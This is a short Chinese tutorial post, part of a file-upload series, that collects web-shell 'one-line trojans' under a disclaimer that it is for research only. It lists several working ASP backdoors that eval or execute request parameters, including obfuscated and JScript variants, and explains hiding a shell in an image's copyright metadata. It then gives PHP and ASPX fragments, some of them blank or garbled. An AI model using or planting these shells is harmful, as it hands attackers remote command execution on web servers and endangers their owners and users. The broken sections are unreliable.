49. 文件上传篇——各类木马的制作

声明：只做技术研究的分享，如果恶意使用造成任何法律责任概不负责！

一、asp一句话木马

<%eval request("CrAcK8")%>

<%executerequest("CrAcK8")%>

<%execute(request("CrAcK8"))%>

<%executerequest("CrAcK8")%><%'<% loop <%:%>

<%'<% loop <%:%><%executerequest("CrAcK8")%>

<%execute request("CrAcK8")'<%loop <%:%>[code]

[code]

%><%Eval(Request(chr(35)))%><%

<%eval request("CrAcK8")%>

<%ExecuteGlobalrequest("CrAcK8")%>

ifRequest("CrAcK8")<>"" then ExecuteGlobalrequest("CrAcK8") end if

//容错代码

<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>

<%

var lcx = {'名字' :Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};

lcx.性别((lcx.名字)+'');

%>

二、ASP一句话图片格式木马

win7下右键图片，在属性->详细信息->版权内插入一句话即可。

三、php一句话木马

 
 
 
 
 
//容错代码 
//使用Lanker一句话客户端的专家模式执行相关的PHP语句 
 
 
/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:h=@eval_r($_POST1); 
 
//绕过
 

四、aspx一句话:

WebAdmin2Y.x.yaaaaa =newWebAdmin2Y.x.y 

(“add6bb58e139be10″);